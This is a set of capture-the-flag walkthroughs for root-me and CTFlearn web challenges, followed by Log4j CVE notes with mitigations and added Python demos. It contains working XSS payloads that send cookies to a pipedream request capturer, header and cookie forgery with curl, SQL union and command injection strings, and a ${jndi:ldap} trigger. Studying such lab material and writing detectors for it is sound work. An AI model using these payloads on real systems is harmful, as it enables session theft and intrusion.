- Create a free request capturer @ https://pipedream.com
- Start event listening at the request capturer
- Visit http://challenge01.root-me.org/web-client/ch18/
- Choose any title
- Enter <script>document.write("<img src=request_capturer_url"+document.cookie+"/>");</script> as message payload (put a ? after the capturer URL so the cookie arrives as a query string rather than glued onto the path; an unquoted src attribute ends at the first space, which does not matter here because a single cookie contains none)
- This is a plain stored XSS: the message is rendered without escaping, so the admin bot's browser executes the script, requests the image and thereby sends its cookie to the capturer
- Wait for the bot to load the image and thus trigger the cookie stealer
- Copy the flag from the cookie in the captured request
- Create a free request capturer @ https://pipedream.com
- Start event listening at the request capturer
- Visit http://challenge01.root-me.org/web-client/ch19/
- Choose any title
- Enter "><script>document.write(%22<img src=request_capturer_url?%22.concat(document.cookie.replace(%22 %22,%22&%22)).concat(%22 />%22))</script> as message payload
- The leading "> breaks out of the attribute the message lands in, the quotation marks are sent percent-encoded (%22) to get them past the filter on quotes and angle brackets, and replace(" ", "&") turns the separator between the first two cookies into a query-string separator so the unquoted src attribute is not cut off at the space (String.replace with a string pattern only replaces the first occurrence; encodeURIComponent(document.cookie) would handle any number of cookies)
- Wait for the bot to load the image and thus trigger the cookie stealer
- Copy the admin cookie from the captured request
- Set your own cookie to the captured admin value (document.cookie in the console, or the Application/Storage tab of the dev tools)
- Visit the admin section
- Copy the flag
- Create a free request capturer @ https://pipedream.com
- Start event listening at the request capturer
- Visit http://challenge01.root-me.org/web-client/ch26/?p=exp' onmouseover='document.write(%22<img src=request_capturer_url?%22.concat(document.cookie).concat(%22 />%22))
- The p parameter is reflected into a single-quoted attribute: exp' closes that attribute, onmouseover=' opens an event handler that writes the cookie-stealing image, and the double quotes inside the handler are percent-encoded (%22) so the payload survives the URL
- Click on Report to the administrator
- Wait for the bot to load the image and thus trigger the cookie stealer
- Copy the flag from the cookie in the captured request
- Create a free request capturer @ https://pipedream.com
- Start event listening at the request capturer
- Visit http://challenge01.root-me.org/web-client/ch32/contact.php
- As a payload insert http://challenge01.root-me.org/web-client/ch32/index.php?number=%27%3Bdocument.location.href%3D%27https%3A%2F%2F6b6fea4abe6e6a0876505f85b3377c72.m.pipedream.net%2F%3Fitworks%3D%27.concat%28document.cookie%29%3B%2F%2F
- The link is the challenge's own index.php with a crafted number parameter; URL-decoded it reads ';document.location.href='<capturer URL>/?itworks='.concat(document.cookie);//, i.e. the leading '; closes the JavaScript string the parameter is written into and ends the statement, document.location.href redirects the bot straight to the capturer with its cookie in the query string, and the trailing // comments out the rest of the original script
- Click on Submit
- Wait for the bot to click on the link
- Copy the flag from the cookie in the captured request
- Request the page with curl -v http://challenge01.root-me.org/web-serveur/ch7/ to see the form and the response headers
- Submit the form with a POST: curl -v -d 'mail=adm%40adm.de&jsep4b=send' http://challenge01.root-me.org/web-serveur/ch7/ (%40 is the URL-encoded @)
- The response sets a cookie with visitor privileges
- Resend the request with -b and the same cookie, its value changed from visitor to admin (the server trusts the client-supplied cookie value for authorization)
- Make a new GET request with that cookie to receive the flag
- Visit http://challenge01.root-me.org/web-serveur/ch4/admin/backup/admin.txt
- Copy the flag
- Set the header rootme admin to true through curl
- For this run curl --header "Header-RootMe-Admin: true" http://challenge01.root-me.org/web-serveur/ch5/
- Copy the flag from the response
- Find your IPv4 address (ipconfig on Windows, ifconfig or ip addr on Linux)
- Run curl http://challenge01.root-me.org/web-serveur/ch68/ -H "X-Forwarded-For: your_ipv4_address" (no quotes around the address inside the header value: everything after the colon is sent verbatim; the server takes this client-supplied header as the source address)
- Copy the flag from the response
- Run curl -v http://challenge01.root-me.org/web-serveur/ch32/login.php?redirect
- Run curl -v http://challenge01.root-me.org/web-serveur/ch32/index.php?redirect
- Copy the flag from the response
- Compute the MD5 hash of any site name, e.g. of google.com (md5sum or any MD5 tool; note that echo adds a trailing newline unless you use echo -n)
- Send a GET request with curl to http://challenge01.root-me.org/web-serveur/ch52/ with the url parameter set to the site and the h parameter set to that hash
- Copy the flag from the response
- Run curl -X POST -F 'score=100000000' -F 'generate=Give+a+try%21' http://challenge01.root-me.org/web-serveur/ch56/
- Copy the flag from the response
- Set the User-Agent header to admin (in Edge it's under dev tools > Network conditions; the server grants access based on this client-supplied header)
- Reload the page
- Copy the flag
- Run curl -v -X OPTIONS http://challenge01.root-me.org/web-serveur/ch8/
- Copy the flag from the response
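The web-serveur challenges from ch7 to ch8 share one flaw: the server derives authorization from values the client controls (a cookie value, User-Agent, X-Forwarded-For, a custom header). The Python example below is added here and is not from the page or from root-me. It runs a constructed local HTTP server that makes those mistakes, replays each forgery against it with http.client, and shows the server-side session lookup that removes the problem. The flag string, the cookie name role, the 10.0.0.0/8 "internal" range and the session id are all made up for the example.

```python
import threading
from http.client import HTTPConnection
from http.cookies import SimpleCookie
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer

FLAG = "flag{constructed-sample}"   # constructed; not a real challenge flag


class TrustingHandler(BaseHTTPRequestHandler):
    """Constructed target that repeats the mistakes of ch7, ch5, ch68 and the
    User-Agent challenge: authorization is derived from values the client sends."""

    def is_admin(self) -> bool:
        cookies = SimpleCookie(self.headers.get("Cookie", ""))
        role = cookies["role"].value if "role" in cookies else "visitor"   # ch7
        ua_admin = self.headers.get("User-Agent") == "admin"             # User-Agent challenge
        magic = self.headers.get("Header-RootMe-Admin") == "true"        # ch5
        # ch68-style: the "client IP" is read from X-Forwarded-For, which any
        # client can set, instead of from the socket (or from a trusted proxy only).
        src = self.headers.get("X-Forwarded-For", self.client_address[0])
        return role == "admin" or ua_admin or magic or src.startswith("10.")

    def do_GET(self):
        body = (FLAG if self.is_admin() else "access denied").encode()
        self.send_response(200)
        self.send_header("Content-Type", "text/plain")
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):   # keep the demo quiet
        pass


# Hardened counterpart: the client only holds an opaque session id; the role
# lives server-side, so editing the cookie value changes nothing.
SESSIONS = {"8f3c2a": "visitor"}   # constructed server-side session store


def role_from_session(cookie_header: str) -> str:
    cookies = SimpleCookie(cookie_header)
    sid = cookies["sid"].value if "sid" in cookies else None
    return SESSIONS.get(sid, "anonymous")


def fetch(port: int, headers: dict) -> str:
    conn = HTTPConnection("127.0.0.1", port, timeout=5)
    conn.request("GET", "/", headers=headers)
    body = conn.getresponse().read().decode()
    conn.close()
    return body


def demo() -> dict:
    """Start the trusting server on a free port and replay each forgery against it."""
    srv = ThreadingHTTPServer(("127.0.0.1", 0), TrustingHandler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    port = srv.server_address[1]
    try:
        return {
            "plain": fetch(port, {}),
            "cookie": fetch(port, {"Cookie": "role=admin"}),
            "ua": fetch(port, {"User-Agent": "admin"}),
            "header": fetch(port, {"Header-RootMe-Admin": "true"}),
            "xff": fetch(port, {"X-Forwarded-For": "10.0.0.5"}),
        }
    finally:
        srv.shutdown()
        srv.server_close()


if __name__ == "__main__":
    for name, body in demo().items():
        print(f"{name:7s} -> {body}")
```

Only the plain request is denied; every forged header is accepted. With role_from_session() the same "role=admin" cookie is ignored because the role is looked up by session id on the server; X-Forwarded-For should likewise only be honoured when the request provably came through your own reverse proxy.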
- Visit https://noxtal.com/
- Open the dev tools
- Go to the Memory tab
- Take a heap snapshot
- Search the snapshot for flag{
- Copy the flag and submit it in the CTFlearn{the_flag} format
- Visit https://web.ctflearn.com/web4/
- Type in test' or '1 = 1
- Inside the results search for the flag
- Install gobuster
- Download the provided wordlist
- Execute gobuster dir -u https://gobustme.ctflearn.com -w ~/Downloads/common.txt (gobuster 3.x syntax; versions before 3.0 take the same -u/-w flags without the dir subcommand)
- Visit the directory it finds, https://gobustme.ctflearn.com/hide
- Install curl
- Visit http://165.227.106.113/post.php
- Open up dev tools and look for the username and password
- Execute curl -X POST -F 'username=admin' -F 'password=71urlkufpsdnlkadsf' http://165.227.106.113/post.php
- Get the flag from the response
- Install curl
- Run curl -A "Sup3rS3cr3tAg3nt" -H "Referer: awesomesauce.com" http://165.227.106.113/header.php
- Get the flag from the response
- Visit https://web.ctflearn.com/web7/
- In the dev tools console enter document.getElementById("d").value = ";ls";
- Press the equal sign: the field value is passed to a shell command on the server, so the ; ends the intended command and ls runs after it (basic command injection)
- Get the flag from the page
- Visit https://web.ctflearn.com/web8/?id=1+union+select+table_name,0x02,0x03,0x04%20from%20information_schema.tables to list the tables (the union must supply the same number of columns as the original query, hence the three filler values)
- Visit https://web.ctflearn.com/web8/?id=1+union+select+(SELECT+*+from+w0w_y0u_f0und_m3),0x02,0x03,0x04 to get the flag from the table found in the previous step
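Both injections above, the web4 string break-out and the web8 union through the schema catalogue, run here against a constructed in-memory SQLite database; this is an added example, not from the page or from CTFlearn. SQLite has no information_schema, so the table list is read from sqlite_master; the hidden table keeps the write-up's name w0w_y0u_f0und_m3, but its column f1ag, the other tables and all rows are made up. The write-up's test' or '1 = 1 relies on MySQL treating the string '1 = 1' as true; the classic ' or '1'='1 form used below works on any engine. The bound-parameter query at the end shows the same input being inert.

```python
import sqlite3

HIDDEN_TABLE = "w0w_y0u_f0und_m3"   # table name taken from the write-up above


def make_db() -> sqlite3.Connection:
    """Constructed schema: a public catalogue, a login table and a hidden flag table."""
    con = sqlite3.connect(":memory:")
    con.executescript(f"""
        CREATE TABLE items(id INTEGER, name TEXT, price TEXT, stock TEXT);
        INSERT INTO items VALUES (1, 'apple', '0.50', '10'), (2, 'pear', '0.70', '3');
        CREATE TABLE users(name TEXT, pw TEXT);
        INSERT INTO users VALUES ('alice', 'hunter2');
        CREATE TABLE {HIDDEN_TABLE}(f1ag TEXT);
        INSERT INTO {HIDDEN_TABLE} VALUES ('flag{{constructed-sample}}');
    """)
    return con


def vulnerable_item(con, item_id: str) -> list:
    """web8-style: the id parameter is pasted into the SQL (numeric context, no quotes)."""
    return con.execute(f"SELECT id, name, price, stock FROM items WHERE id = {item_id}").fetchall()


def vulnerable_login(con, name: str) -> list:
    """web4-style: a single quoted string parameter pasted into the SQL."""
    return con.execute(f"SELECT name FROM users WHERE name = '{name}'").fetchall()


def safe_item(con, item_id: str) -> list:
    """Same lookup with a bound parameter: the input is data, never SQL."""
    return con.execute("SELECT id, name, price, stock FROM items WHERE id = ?", (item_id,)).fetchall()


def union_extract(con) -> str:
    """Reproduce the two-step union attack: find the hidden table, then read it."""
    # Step 1: union against the schema catalogue. The page uses information_schema.tables
    # (MySQL); SQLite's equivalent is sqlite_master. 2, 3, 4 are fillers so the column
    # count matches the original SELECT.
    rows = vulnerable_item(con, "1 UNION SELECT name, 2, 3, 4 FROM sqlite_master WHERE type = 'table'")
    tables = [r[0] for r in rows if isinstance(r[0], str)]
    target = next(t for t in tables if t not in ("items", "users"))
    # Step 2: pull the hidden table's content out through the same text column.
    rows = vulnerable_item(con, f"1 UNION SELECT (SELECT f1ag FROM {target}), 2, 3, 4")
    return next(r[0] for r in rows if isinstance(r[0], str))
```

The rows returned by the union are filtered by type rather than by position because SQLite's UNION returns a de-duplicated result whose order is not guaranteed; in the real challenge the injected row is simply the one that shows up in the page where the legitimate row would.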
- Visit https://ctflearn.com/robots.txt
- Look for the disallow URL
- Visit https://ctflearn.com/70r3hnanldfspufdsoifnlds.html
- Get the flag from the page
- Visit https://www.base64decode.org/
- Decode the provided key (base64 is an encoding, not encryption, so no key is needed)
Description (CVE-2021-44228, "Log4Shell"): Apache Log4j2 2.0-beta9 through 2.12.1 and 2.13.0 through 2.15.0 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0, this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.
Affected versions: 2.0-beta9 through 2.12.1 and 2.13.0 through 2.15.0
Fixed versions: from log4j 2.15.0 this behavior has been disabled by default; from version 2.16.0 this functionality has been completely removed
Impact: remote code execution
```java
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

// Logging attacker-controlled text is enough: with message lookups enabled the
// ${jndi:...} pattern is resolved and the class served by the LDAP endpoint is
// loaded. The LDAP server assumed on 127.0.0.1:1389 is not part of this snippet.
public class log4j {
    private static final Logger logger = LogManager.getLogger(log4j.class);

    public static void main(String[] args) {
        logger.error("${jndi:ldap://127.0.0.1:1389/a}");
    }
}
```
- Restrict LDAP access via JNDI
- Disable most JNDI protocols
- Log4j 1.x mitigation: Log4j 1.x does not have Lookups so the risk is lower. Applications using Log4j 1.x are only vulnerable to this attack when they use JNDI in their configuration. A separate CVE (CVE-2021-4104) has been filed for this vulnerability. To mitigate: audit your logging configuration to ensure it has no JMSAppender configured. Log4j 1.x configurations without JMSAppender are not impacted by this vulnerability.
- Log4j 2.x mitigation: Implement one of the mitigation techniques below.
- Java 8 (or later) users should upgrade to release 2.16.0 (the advice at the time this note was written; 2.16.0 was itself found to have a further issue, CVE-2021-45105, so take the current 2.17.x or newer release)
- Users requiring Java 7 should upgrade to release 2.12.2 (work in progress when the note was written; it has since been released)
- Otherwise, remove the JndiLookup class from the classpath: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class (verify by listing the jar contents afterwards: JndiLookup.class must be gone)
- In releases 2.10 through 2.14.1 this behavior can be mitigated by setting the system property log4j2.formatMsgNoLookups (or the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS) to true; this was later shown to be incomplete for configurations whose pattern layout uses a Context Lookup (CVE-2021-45046), so treat it as a stopgap, not a fix
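The detection side of the above, as an added example that is not from the page or from the Log4j project: scanning access-log lines for the ${jndi:...} lookup, including the nesting tricks (${lower:j}, ${::-j}) and percent-encoding attackers use to hide the string from naive grep rules. The log lines and the attacker address 198.51.100.9 are constructed; the lookup emulation covers only lower, upper and the :-default syntax, a deliberately small subset of what Log4j 2 actually resolves, so a production rule set should be broader.

```python
import re
from urllib.parse import unquote

# Innermost ${...} lookup (no nested '${' inside), and the lookup we are after.
INNER = re.compile(r"\$\{([^${}]*)\}")
JNDI = re.compile(r"\$\{\s*jndi:", re.IGNORECASE)

# Constructed access-log lines (198.51.100.9 is a documentation address):
# 1 benign, 2 plain payload in User-Agent, 3 nested-lookup obfuscation in the
# query string, 4 the same trick percent-encoded, 5 a harmless lookup.
LOGS = [
    '10.0.0.7 - - [10/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 "-" "Mozilla/5.0"',
    '10.0.0.8 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 "-" "${jndi:ldap://198.51.100.9:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:12:00:03 +0000] "GET /?x=${${lower:j}ndi:${lower:l}dap://198.51.100.9:1389/b} HTTP/1.1" 400 "-" "curl/7.79"',
    '10.0.0.9 - - [10/Dec/2021:12:00:04 +0000] "GET / HTTP/1.1" 200 "-" "%24%7B%24%7B%3A%3A-j%7Dndi%3Armi%3A%2F%2F198.51.100.9%3A1099%2Fc%7D"',
    '10.0.0.10 - - [10/Dec/2021:12:00:05 +0000] "GET / HTTP/1.1" 200 "-" "${date:yyyy}"',
]


def _resolve(m):
    """Emulate the few lookups attackers use to assemble 'jndi' at runtime:
    ${x:-default} yields default, ${lower:X}/${upper:X} change case. Anything
    else (including jndi itself) is left in place for the detector to see."""
    token = m.group(1)
    if ":-" in token:
        return token.split(":-", 1)[1]
    name, _, arg = token.partition(":")
    name = name.strip().lower()
    if name == "lower":
        return arg.lower()
    if name == "upper":
        return arg.upper()
    return m.group(0)


def normalize(text: str, max_rounds: int = 10) -> str:
    """Percent-decode, then resolve nested lookups from the inside out."""
    text = unquote(text)
    for _ in range(max_rounds):
        resolved = INNER.sub(_resolve, text)
        if resolved == text:
            break
        text = resolved
    return text


def scan(lines) -> list:
    """Return (line number, normalized ${jndi:...} lookup) for each hit."""
    hits = []
    for number, line in enumerate(lines, 1):
        norm = normalize(line)
        m = JNDI.search(norm)
        if m:
            end = norm.find("}", m.start())
            stop = end + 1 if end >= 0 else len(norm)
            hits.append((number, norm[m.start():stop]))
    return hits


if __name__ == "__main__":
    for number, lookup in scan(LOGS):
        print(f"line {number}: {lookup}")
```

Lines 2, 3 and 4 are reported with the same canonical ${jndi:<scheme>://host:port/path} form, which is what you want to pivot on (the callback host and port) when hunting across a fleet; line 5's ${date:yyyy} is left alone because an unknown lookup is not evidence on its own.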
Description (CVE-2019-17571): Included in Log4j 1.2 is a SocketServer class that is vulnerable to deserialization of untrusted data which can be exploited to remotely execute arbitrary code when combined with a deserialization gadget when listening to untrusted network traffic for log data. This affects Log4j versions 1.2 up to 1.2.17.
Affected versions: 1.2 up to 1.2.17
Fixed versions: 2.8.2 or higher
Impact: remote code execution
```java
import java.io.BufferedInputStream;
import java.io.IOException;
import java.io.InterruptedIOException;
import java.io.ObjectInputStream;
import java.net.Socket;
import org.apache.log4j.Logger;
import org.apache.log4j.spi.LoggerRepository;

// Excerpt of Log4j 1.2's SocketNode with the class shell and fields restored. The
// constructor wraps the raw client socket in an ObjectInputStream; run() (not shown)
// calls ois.readObject() on whatever the peer sends, so any client that can reach the
// SocketServer port can deliver a deserialization gadget chain.
public class SocketNode {
    private Socket socket;
    private LoggerRepository hierarchy;
    private ObjectInputStream ois;
    private static final Logger logger = Logger.getLogger(SocketNode.class);

    public SocketNode(Socket socket2, LoggerRepository hierarchy2) {
        this.socket = socket2;
        this.hierarchy = hierarchy2;
        try {
            this.ois = new ObjectInputStream(new BufferedInputStream(socket2.getInputStream()));
        } catch (InterruptedIOException e) {
            Thread.currentThread().interrupt();
            logger.error(new StringBuffer().append("Could not open ObjectInputStream to ")
                .append(socket2).toString(), e);
        } catch (IOException e2) {
            logger.error(new StringBuffer().append("Could not open ObjectInputStream to ")
                .append(socket2).toString(), e2);
        } catch (RuntimeException e3) {
            logger.error(new StringBuffer().append("Could not open ObjectInputStream to ")
                .append(socket2).toString(), e3);
        }
    }
}
```